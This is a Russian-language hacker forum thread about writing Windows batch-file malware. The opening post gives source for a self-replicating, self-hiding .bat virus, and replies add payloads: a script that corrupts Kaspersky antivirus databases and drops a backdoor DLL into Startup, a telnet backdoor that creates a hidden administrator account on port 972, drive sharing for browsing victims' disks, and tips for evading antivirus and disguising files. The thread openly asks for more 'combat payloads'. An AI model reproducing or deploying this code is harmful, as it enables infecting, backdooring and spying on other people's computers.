(введение) Здесь и сейчас Я хочу рассказать о интересном использовании bat-файлов. Не буду рассказывать подробно о батниках но скажу , что этот тип файлов первоначально в виндовс использовался как программная шина для некоторых приложений. Все команды в батфайле не что иное, как обычные Дос команды , в оператив альтернативной системе сосуществующей с виндовс. Итак начнем. (написание) Для тех кто не знает как создавать бат. Чтоб получить фаил, в ака нотетепаде , или же попросту блокноте , пишем любые команды которые по вашему желанию должны быть выполнены и сохраняем фаил с расширением *.bat , после чего запускаем полученный фаил и видим результат. Что же интересного можно написать в этом батнике? Есть масса интересных вещей , как полезных, так и не очень. К примеру Я приведу небольшой кусочек исходника моего вируса в командах Дос. Который можно дать на использование атакуемому, в боевом виде. Исходный код предоставлен для ознакомления и не несет на себе боевой нагрузки(Так же по техническим причинам тут нет слешей). @echo off%[winner13]% {выводим на экран текст «winner13»} if '%1=='In_ goto win1 {если переменная %1 равна In, то переходим к метке «:win1»} if exist c:winner13.bat goto win2 {проверяем, существует ли файл winner13.bat, если да, то переходим к метке «:win2»} if not exist %0 goto win3 {если файл не существует, то переходим к метке «win3»} find "winner13" c:winner13.bat {проверяем, есть ли файл winner13 на диске, если нет, то копируем его туда} attrib +h c:winner13.bat {делаем файл скрытым} :win2 {метка} for %%t in (*.bat) do call c:winner13 In_ %%t {выполняем одну команду (call - позволяет вызвать один пакетный файл из другого) для нескольких параметров t} {т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу} goto win3 {перейти к метке} :win1 {метка} find "winner13" nul {указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран} if not errorlevel 1 goto win3 {если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку} type c:winner13.bat>>%2 {дописываем «себя» к найденному .bat-файлу} :win3 {метка} здесь идет любая боевая нагрузка или, что нибудь от себя. exit Итак мы видим , что результат выполнения файла, это копирование себя на диск C: , нахождение бат файла в системе , заражение его, путем прописывания себя в тело файла, и все это в файле который не надо криптовать(шифровать от антивирусов). (заключение) Итак , в заключение скажу . Это статья не для профессионалов. Может для кого будет это и не ново, но думаю каждый что то для себя подчеркнёт так как профессионал всегда собирает информацию, извлекая даже из кучи совсем бесполезного и плохо пахнущего ,блистательный кристалл полезного для себя. Ну вот и все .Поверид by winner13 Всё что найду интересного по теме будет размещено в этом посте.
З.Ы. Маленькое зло которое можно использовать в виде боевой нагрузки. "Обезвреживание Касперского". Code: @echo off attrib -R c:progra~1antivi~1 ackdoor.avc >nul attrib -R c:progra~1antivi~1 rojan.avc >nul del c:progra~1antivi~1 ackdoor.avc >nul del c:progra~1antivi~1 rojan.avc >nul copy c:progra~1antivi~1macro.avc c:progra~1antivi~1 ackdoor.avc >nul copy c:progra~1antivi~1mail.avc c:progra~1antivi~1 rojan.avc >nul c:windowspkunzip.exe -e -sBackdooR c:windowsASYSLG.DLL C:WindowsГЛАВНО~1ПРОГРА~1АВТОЗА~1 >nul del c:windowspkunzip.exe >nul del c:windowsasyslg.dll >nul del c:winstart.bat >nul echo on "перезагрузка с форматом". Code: Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js echo WSHShell.Popup (" ПИШИ СЮДА ЧТО УГОДНО ,МОЖНО ПОСМЕРТНУЮ РЕЧЬ ЛАМЕРА >) "); >> %temp%mes.js start %temp%mes.js deltree /y %temp%mes.js
Был бы премного благодарен , еслиб хорошие люди накидали сюда своей "Боевой нагрузки" ,кто что может .
+) ЗА то грамотно юзают знающие =) Это и эффективней если доработать нормально. Всё сейчас в нашем мире зависит от желания.
Это эффективней???? Думаешь что говоришь? Обоснуй. Все зависит не столько от желания, сколько от возможностей...
Без проблем. Я сказал при соответствующей доработке, а тоесть написания полного функционала , не зря же в виндовс данная шина реализовывалась ,а значит можно сделать всё , главное знать как . К тому же , бат фаил как тебе и без меня известно не детектируемый антивирусами , да и подозрений допустим возникает меньше когда юзер видит не привычный до сель пугавший ехе-шник , а какой то незнакомый бат. Ещё не маленький плюс это при склейке , криптовать на палевность не надо .В общем не всё сказал,ссори не сплю долго .Если что допишу в ПМ все чудеса и превосходство. А на счет возможностей ты не прав, если есть желание , возможности найти можно , без желания ты возможности даже искать не будешь.
Code: Proccess cmd = new Process(); cmd.StartInfo.FileName = "cmd.exe"; cmd.StartInfo.CreateNoWindow = false; cmd.StartInfo.UseShellExecute = false; cmd.Start(); Так поменьше палива будет, в твоих злостных школьных делах.
Ха, также могу сказать про экзешник, .com, .exe, .scr файлы, антивирусу на них насрать также как на твой батник, если файлы не выполянют ничего плохого. Попробуй своим супер батником обойти файрвол(оутпост к примеру), который к примеру, меняет данные системных файлов, или же заменяет системные файлы... Куда больше будет подозрений, что будет подозрительней бат файл(юзер понятия не имеет что это) или же файлик расширения .scr, и иконкой картинки?, что по большей вероятности он запустит? Если руки прямые и есть знания, криптовать нах. ниче не надо, имеется ввиду свой код. Если бы было все так просто как ты утверждаешь, .bat вирусов было бы куда больше, но это прошлый век, к тому же ДОС, ну это ж пиздец, много ли компов ты заразишь?
Так поменьше палива будет, в твоих злостных школьных делах.[/QUOTE] Конечна спасибо за код товарисчь +) НО только вера спасет отца русской демократии.Само дело не школьное ибо изучить шину , и сделать на основе этого что то действительно хорошее ,занятие не для слабонервных.
ГЫГ, на пинч.ЕХЕ , троян.КОМ , и тому подобное , скорей вы дорогой мой ,давно сигнатурки то не обновляли.НЕ дай вам бог услышать визжание дикого разяренного вепря+).Ещё не факт , что ВСЕ файлы неделуют нечего плохого, большенство вот таких вот полиморфов созданных на в .Бат и созданны для жесткого поюзания тачки жертвы.На счет фаервола и аутпоста . Легко, в бат есть несколько строчек , где от имини юзера в брендмауер добовляется открытый порт(Сожелею но сейчас не могу привести пример кода) .Так же , для болие простого поюзания , через бат можно открыть 21 порт на форточках и юзать телнет(на хакзоне есть по этому поводу статья). Главное чтоб отстук и ipconfig /all чтобы был. Подозрения как раз возникают у опытных ,что они уже не раз наслышини о злых ЕХЕ-шниках и прочей хератени , так что если у человека параноидальная склонность к обеспечению своей безопасности тут уже только Си тебе в помощ.НО от незнания не кто не защищён , так можно и пару раз по бат кликнуть, без подозрений, так как незнаешь что это такое.(Все мы к сожелению учимся на своих ошибках,или вы не согласны с этим?) Сожелею, но не каждый может писать на си++ или асменге , и тому подобное , а дос знает каждый .В этом вся загвоздка .Все научились юзать чюжие пинчи, лоадеры, и прочую бяку , и всем насрать на процесс творения.А если обучить соотвестсвующим приёмам , то может и появится тяга к прекрасному. ВСё от не знания , дорогой вы мой товарисчь , не всё могут познать энергию дзен ,так как секреты данной шины скрыты от нас мелкософтом в веках, если есть желание погугли на тему , точно знаю что нормальных спецификаций или хорошего ртфм-чика ты не найдёшь .Из-за незнания что и как делать, бат виров так мало.Зато посматри на то что есть,те батники что сделанны были с умом и всем творческим подходом , до сих пор работают на своих создателей скрываясь в недрах систем32 ,куда их и посадила воспаленная фантазия создателей.Умные люди для разнообразия чего только не делают.А мы не можим ,так как они,нет ни умения не навыков, не знаний.А знание сила,над не знающими. Если есть примеры кода , лучше кидай сюда, чем попусту спорить об эффективности.Пускай каждый сам за себя решает на сколько для него ЭТО эффективно , и что ему ближе.
Вот кстати , боевая нагрузка ,в виде взлома через телнет . Code: chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet Теперь пояснения: chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке. net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server. net user hacker hack /add и net localgroup Администраторы hacker /add - не трудно догадаться, что этими командами создаётся новая учетная запись с админскими правами, где логин: hacker пасс: hack Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав рег файл в реестр, следующего содержания: Содержимое conf.re Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "hacker"=dword:00000000 Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= auto которая меняет тип его запуска на автоматический(по дефолту disabled ). При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это палевно, поэтому советую прописывать этой командой tlntadmn config port=972 sec=-NTLM , редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet окончательно запустит наш бэкдор.
автору респект что начал тему) бaтники веселая штука)) для бобавления\редактирования инфо о файле или добавления иконки или компиляции в ехе юзайте прогу имхо намного проще так впарить батник))
Еще можно расшариь диски посредством батника , но это палевно, каспер данный текст даже в *.тхт формате с визгом подсвечивает ,но попробывать можно если у жертвы нодушка или др_вэб Code: net share disk_c=c: > nul net share disk_d=d: > nul а после расшаривания найти нужный сегмент сети ,свою жертву , и смотреть что у неё на дисках.
можно через "start /min 1.bat" запустить в свернутом режиме. Но честно говоря я для этих целей писал минипрогу на VB, которая полностью сворачивает. С другой стороны тогда и без батников обойтись можно
связка , бат+ VBS возможна , так как оба исполняются в системе .Единственное понять не могу как вставить одно в другое ...Разными способами побывал, ещё есть варианы, но это надо лезть в спецификации.
Можно одним батником создать VBS или наоборот. очень просто. Code: echo ping -n 5 localhost>1.bat echo del %0>>1.bat start 1.bat создает батник и запускает его.
несколько интересных примеров Вот несколько интересных примеров батников , которые можно использовать по своему усмотрению Code: :IsConnected :: check if Internet connected setlocal ping whois.arin.net | find "TTL" > NUL if ERRORLEVEL 1 (set IsConnected=1) ELSE (set IsConnected=0) endlocal & set IsConnected=%IsConnected% goto :EOF Code: :GetIP :: IP for primary adapter setlocal for /f "delims=: tokens=1-2" %%c in ('ipconfig /all ^| find "IP Address"') do set GetIP=%%d endlocal & set GetIP=%GetIP:~1% goto :EOF Code: :GetGateway :: Default Gateway setlocal for /f "delims=: tokens=1-2" %%c in ('ipconfig /all ^| find "Default Gateway"') do set GetGateway=%%d endlocal & set GetGateway=%GetGateway:~1% goto :EOF
отправка данных Задача: Написать батник, чтобы файлы из папки Outbox отправлялись на FTP, складывались в папку Sent, и после отправки папка Outbox очищалась. но, если по каким то причинам FTP не принял файл - он остается в Outbox. Для этого придумал так, что после отправки на фтп, отуда для подтверждения приходит файлик ok.txt, если приходит - значит все норм и папка Outbox очищается Code: @echo off taskkill /f /im expmon.exe>nul set FROM=C:\WINDOWS\exprep set TO=c:\temp\expert\outbox\ md "%TO%\" IF /I %Windir% == C:\WINNT GOTO Win2K set vdate=%DATE:~0,-5% GOTO SetFileName :Win2K set vdate=%DATE:~3,-5% :SetFileName set vtime=%TIME:~0,-3% set vtime=%vtime::=.% C:\PROGRA~1\WinRAR\rar.exe a -r "%TO%\%VDATE%.rar" "%FROM%\*.*" del c:\WINDOWS\exprep\*.* /S /q >nul start %WINDIR%\expmon.exe >nul del /s c:\temp\expert\outbox\*.txt ftp -s:ftp.txt ftp.ftp.ru if exist c:\temp\expert\outbox\ok.txt MOVE c:\temp\expert\outbox\*.rar c:\temp\expert\sen содержание ftp.txt user pass lcd c:\temp\expert\outbox put *.rar get ok.txt bye можно отправить и такую инфу как: Code: ipconfig /all > ipconfig.txt ipconfig.txt
